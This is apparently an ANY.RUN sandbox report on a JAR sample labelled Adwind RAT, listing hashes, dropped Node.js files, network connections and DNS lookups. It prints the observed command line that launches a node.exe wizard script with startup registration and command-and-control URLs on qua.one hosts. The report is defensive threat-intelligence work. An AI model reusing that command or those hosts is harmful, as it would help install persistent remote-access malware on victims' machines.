analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Kafan_Sample_d06a88f0edeaf77c468dbabb3580bc6ba4812be5eec6cb8446b9f7f41bcc2494.jar

Full analysis: https://app.any.run/tasks/f0bf0269-eb78-48cc-aec1-9fb53823d4d4
Verdict: Malicious activity
Threats:

Adwind RAT, sometimes also called Unrecom, Sockrat, Frutas, jRat, and JSocket, is a Malware As A Service Remote Access Trojan that attackers can use to collect information from infected machines. It was one of the most popular RATs in the market in 2015.

Malware Trends Tracker     >>>
Analysis date: May 30, 2020, 07:22:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
adwind
rat
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5:

BCF2D1A52DCBAA0A5AF0867DF9E1287D

SHA1:

3AB1CCE1CC4D351680F39AD199EDB361A50C9D2F

SHA256:

D06A88F0EDEAF77C468DBABB3580BC6BA4812BE5EEC6CB8446B9F7F41BCC2494

SSDEEP:

96:UVtx7MmLa9EoxR7ouqA+j24UmWX9QEtFvCJDEbyjfLJA0fpIb43N7xBh3glP:Ix7box5pqAvjja9UyjdApE3N1OP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Creates files in the user directory

      • javaw.exe (PID: 632)

  • INFO

    • Dropped object may contain Bitcoin addresses

      • javaw.exe (PID: 632)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.jar | Java Archive (78.3)
.zip | ZIP compressed archive (21.6)

EXIF

ZIP

ZipFileName: META-INF/
ZipUncompressedSize: -
ZipCompressedSize: 2
ZipCRC: 0x00000000
ZipModifyDate: 2020:05:25 09:15:11
ZipCompression: Deflated
ZipBitFlag: 0x0808
ZipRequiredVersion: 20
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start javaw.exe node.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
632"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\Desktop\Kafan_Sample_d06a88f0edeaf77c468dbabb3580bc6ba4812be5eec6cb8446b9f7f41bcc2494.jar"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe
explorer.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Version:
8.0.920.14
3192C:\Users\admin\qnodejs-node-v13.13.0-win-x86\node.exe C:\Users\admin\qnodejs-node-v13.13.0-win-x86\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://central.qhub.qua.one --central-base-url https://3769683.middlegate.qua.one --central-base-url https://fake1.3769683.middlegate.qua.one --central-base-url invalid.https://3769683.middlegate.qua.oneC:\Users\admin\qnodejs-node-v13.13.0-win-x86\node.exejavaw.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js: Server-side JavaScript
Version:
13.13.0
Total events
7
Read events
7
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
1 750
Unknown types
11

Dropped files

PID
Process
Filename
Type
632javaw.exeC:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node.exe
MD5:
SHA256:
632javaw.exeC:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\CHANGELOG.mdhtml
MD5:4B4151CB6CA2A9CD66238FB8EEC003A3
SHA256:271FCB46F0552F847E6E5B88CDDD03168ED11E6E354B1C15FA92ED553B92EF5B
632javaw.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamptext
MD5:361D219D65364A751C2B5550F08995FC
SHA256:272294178E9EEEBAF53749AB667A88B9897DB0B092A600AB3F9F0D9500C85917
632javaw.exeC:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\install_tools.battext
MD5:4E46AD93BAC466280DED1D0C19863A26
SHA256:4B1E875422E7A3BA28DC1A618E7569A27E2A491C161E0ADB742434B14F773BED
632javaw.exeC:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\LICENSEtext
MD5:698CF46FBBD1EF7145D1D4F4977E9743
SHA256:EAC4065F78A73669E3058A72CB936D5C79E7CE766C6ACF87A6AB37CF8D702064
632javaw.exeC:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node_modules\npm\.npmignoretext
MD5:4416DF8582A08A4C3297F4DD5DE3908B
SHA256:F885519DB536EC02B192521A48D63E2EE9B849092905D117E07A862DBB6C73B1
632javaw.exeC:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\nodevars.battext
MD5:E6636C5B093F5CC13DFB7508305B8D8B
SHA256:A2B020E2F641524C6FD1B8EBBCD9EE03C7DC44009F2B78E701E773AD048BE9A5
632javaw.exeC:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node_etw_provider.mantext
MD5:1D51E18A7247F47245B0751F16119498
SHA256:1975AA34C1050B8364491394CEBF6E668E2337C3107712E3EECA311262C7C46F
632javaw.exeC:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node_modules\npm\bin\npx.cmdtext
MD5:D679D19CFAB093D75D4B75672A0BA98A
SHA256:B6004636A98CBB9814FDFC98BB7365E78AB48B3208F60AC5B2F17794C5285F26
632javaw.exeC:\Users\admin\qnodejs-node-v13.13.0-win-x86.tmp2378256566\node-v13.13.0-win-x86\node_modules\npm\.licensee.jsontext
MD5:B133415ABE39E5C1865AAD84712B3941
SHA256:66218BC67A524799BA7CCAD7C493A8D24EEED81C07BED24E0C3034ABA6014061
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
632
javaw.exe
104.20.23.46:443
nodejs.org
Cloudflare Inc
US
shared
64.225.101.88:443
central.qhub.qua.one
Peer 1 Network (USA) Inc.
US
malicious

DNS requests

Domain
IP
Reputation
nodejs.org
  • 104.20.23.46
  • 104.20.22.46
whitelisted
central.qhub.qua.one
  • 64.225.101.88
whitelisted

Threats

Found threats are available for the paid subscriptions
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Kafan_Sample_d06a88f0edeaf77c468dbabb3580bc6ba4812be5eec6cb8446b9f7f41bcc2494.jar